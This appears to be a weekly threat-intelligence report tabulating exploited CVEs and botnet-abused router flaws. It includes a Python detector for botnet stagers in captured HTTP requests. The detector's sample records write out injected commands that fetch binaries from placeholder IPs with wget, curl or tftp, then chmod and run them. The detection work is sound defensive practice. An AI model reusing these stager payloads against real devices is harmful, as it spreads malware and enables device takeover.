Executive Summary
Trending / Critical Vulnerabilities
The vulnerabilities trending this week reflect the latest emerging and widely discussed threats. The Exploited-in-Wild, EPSS and CISA KEV columns are included so that patch prioritization can be based on observed exploitation rather than CVSS alone.
| CVE-ID | Type of vulnerability | Severity | CVSS | Affected Product | Exploited-in-Wild | EPSS score | CISA-KEV | Zero-day | OSS |
|---|---|---|---|---|---|---|---|---|---|
| CVE-2024-0769 | Command Injection | Critical | 9.8 | D-Link DIR-859 1.06B01 | True | 0.00212 | False | False | False |
| CVE-2024-20399 | OS Command Injection | Medium | 6.7 | Cisco NX-OS | True | 0.02252 | True | True | False |
| CVE-2024-6387 | Race Condition | High | 8.1 | OpenSSH server (sshd) | True | 0.00046 | False | False | True |
| CVE-2024-39891 | Unauthenticated Endpoint | Medium | 5.3 | Twilio Authy API | True | 0.00045 | False | False | False |
| CVE-2024-38366 | Remote Code Execution | Critical | 10.0 | CocoaPods Trunk | False | 0.00045 | False | False | True |
| CVE-2024-23692 | Template Injection | Critical | 9.8 | Rejetto HTTP File Server | True | 0.0021 | False | False | False |
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed to identify which vulnerabilities are being actively exploited and actively scanned for. Source IPv4 addresses and captured payloads serve as the supporting evidence and can be provided on a need-to-know basis.
| Vulnerabilities | Product | Severity | Title | Exploited-in-Wild | CISA KEV |
|---|---|---|---|---|---|
| CVE-2024-3400 | Palo Alto Networks PAN-OS | Critical | Command Injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS | True | True |
| CVE-2024-29973 | Zyxel NAS326 and NAS542 devices | Critical | Command Injection vulnerability in the "setCookie" parameter in Zyxel NAS326 and NAS542 devices | False | False |
| CVE-2024-22729 | NETIS SYSTEMS MW5360 V1.0.1.3031 | Critical | Command Injection vulnerability in NETIS SYSTEMS MW5360 V1.0.1.3031 via the password parameter on the login page | False | False |
Vulnerabilities abused by Botnet
Vulnerabilities identified as exploited by botnets, including recent CVEs logged in MISP. The top 5 CVEs whose captured payloads are indicative of botnet activity (for example, invoking wget against a bare IP address rather than a hostname) are presented below.
| Vulnerability | Product | Title | Exploit | Abused by Botnet |
|---|---|---|---|---|
| CVE-2018-10562 | GPON Home Router | Command Injection vulnerability in GPON home router | True | Zergeca, Zerobot, LiquorBot, Mirai, Gafgyt |
| CVE-2017-17215 | Huawei HG532 | Remote code execution vulnerability in Huawei HG532 router | True | HinataBot, Zerobot, Mirai, Bashlite, Tsunami, Gitpaste, Beastmode, Enemybot, PerlBot, Zergeca, Ircbot |
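The "wget with an IP address" heuristic used above to separate botnet propagation from ordinary scanning is simple to automate over sensor captures. The following is an added example, not Loginsoft or Cytellite code: it URL-decodes each captured request, flags any wget/curl/tftp invocation whose target is a bare IPv4 literal, notes whether the payload also chmods the dropped file (download-and-execute chain) and whether the dropper is served from the scanning host itself. The request-record layout and the sample payloads are constructed assumptions for illustration, not real telemetry or any specific CVE's exploit.

```python
"""Flag botnet-style download-and-execute stagers in captured HTTP requests.

Added example (not Loginsoft/Cytellite code). Implements the report's
heuristic: a downloader (wget/curl/tftp) pointed at a bare IPv4 address is a
strong indicator of automated botnet propagation. Record layout
(src_ip, request line, body) and all sample payloads are assumptions.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

# Downloader invocation, then (non-greedily, within the same shell command)
# an IPv4 literal with optional scheme, port and path.
STAGER_RE = re.compile(
    r"(?:busybox\s+)?(?P<tool>wget|curl|tftp|ftpget)\b[^;&|`\n]*?"
    r"(?:(?:https?|ftp|tftp)://)?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})(?::(?P<port>\d{1,5}))?"
    r"(?P<path>/[^\s;&|`'\"]*)?",
    re.IGNORECASE,
)
# Follow-on chain that turns the drop into execution: chmod 7xx or chmod +x.
EXEC_RE = re.compile(r"chmod\s+(?:\+x|[0-7]*7[0-7]*)\s+\S+", re.IGNORECASE)


@dataclass
class StagerHit:
    src_ip: str          # host that sent the request
    tool: str            # downloader invoked in the payload
    download_ip: str     # IPv4 literal the payload fetches from
    port: Optional[int]
    path: str
    executes: bool       # payload also chmods the dropped file
    self_hosted: bool    # dropper served from the scanning host itself


def normalise(text: str) -> str:
    """URL-decode up to twice: mass scanners frequently double-encode payloads.
    Note that '+' in form/query encoding is a space, so a literal 'chmod +x'
    must arrive as 'chmod+%2Bx' to survive decoding."""
    out = unquote_plus(text)
    return unquote_plus(out) if "%" in out else out


def scan_request(src_ip: str, request_line: str, body: str) -> Optional[StagerHit]:
    payload = normalise(request_line + " " + body)
    for m in STAGER_RE.finditer(payload):
        try:
            ipaddress.IPv4Address(m.group("ip"))  # rejects 999.1.1.1-style false hits
        except ipaddress.AddressValueError:
            continue
        return StagerHit(
            src_ip=src_ip,
            tool=m.group("tool").lower(),
            download_ip=m.group("ip"),
            port=int(m.group("port")) if m.group("port") else None,
            path=m.group("path") or "",
            executes=bool(EXEC_RE.search(payload)),
            self_hosted=(m.group("ip") == src_ip),
        )
    return None


def scan_all(records: List[Tuple[str, str, str]]) -> List[StagerHit]:
    return [h for h in (scan_request(*r) for r in records) if h is not None]


def dropper_hosts(hits: List[StagerHit]) -> Dict[str, int]:
    """Hits per download host: the list to block, sinkhole or pivot on."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[h.download_ip] = counts.get(h.download_ip, 0) + 1
    return counts


# Constructed sample records (src_ip, request line, body); none are real telemetry.
SAMPLE_REQUESTS = [
    ("203.0.113.10", "POST /cgi-bin/diag.cgi",
     "dest_host=%60wget+http%3A%2F%2F198.51.100.7%3A8080%2Fbins%2Fmips+-O+%2Ftmp%2Fx%3B"
     "+chmod+777+%2Ftmp%2Fx%3B+%2Ftmp%2Fx%60"),
    ("203.0.113.11",
     "GET /login.cgi?password=%3Bcurl%20http%3A%2F%2F192.0.2.44%2Farm7%20-o%20%2Ftmp%2F.a"
     "%3Bchmod%20%2Bx%20%2Ftmp%2F.a%3B%2Ftmp%2F.a", ""),
    ("198.51.100.9", "POST /shell", "cmd=busybox tftp -g -r bot.sh 198.51.100.9"),
    ("203.0.113.13", "POST /api/update", "cmd=wget http://updates.example.com/fw.bin -O /tmp/fw"),
    ("203.0.113.14", "GET /index.html", ""),
]

if __name__ == "__main__":
    found = scan_all(SAMPLE_REQUESTS)
    for hit in found:
        print(hit)
    print(dropper_hosts(found))
```

The hostname-based wget in the fourth record is deliberately not flagged: legitimate firmware updaters and admin scripts fetch from DNS names, whereas IoT botnet stagers almost always hardcode the dropper's IP. The `self_hosted` flag is worth surfacing separately, because an infected device serving its own binary is a direct lead to the scanning node's malware sample.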
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities targeted by adversaries. Each vulnerability is manually analyzed and mapped to MITRE ATT&CK tactics and techniques. The information is drawn from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
| Vulnerability | Severity | Title | Patch | Targeted By Malware | OSS |
|---|---|---|---|---|---|
| CVE-2024-20399 | Medium | OS Command Injection vulnerability in the CLI of Cisco NX-OS | True | Velvet Ant | False |
| CVE-2024-23692 | Critical | Template Injection vulnerability in Rejetto HTTP File Server up to and including version 2.3m | False | CoinMiner, XMRig, LemonDuck, XenoRAT | False |
PRE-NVD observed for this week
Pre-NVD refers to vulnerabilities that are discovered, and potentially exploited, before their official inclusion in the National Vulnerability Database. The LOVI platform aggregates and distributes such data from open sources and social media; it currently tracks over 100 security alerts, with plans to expand coverage.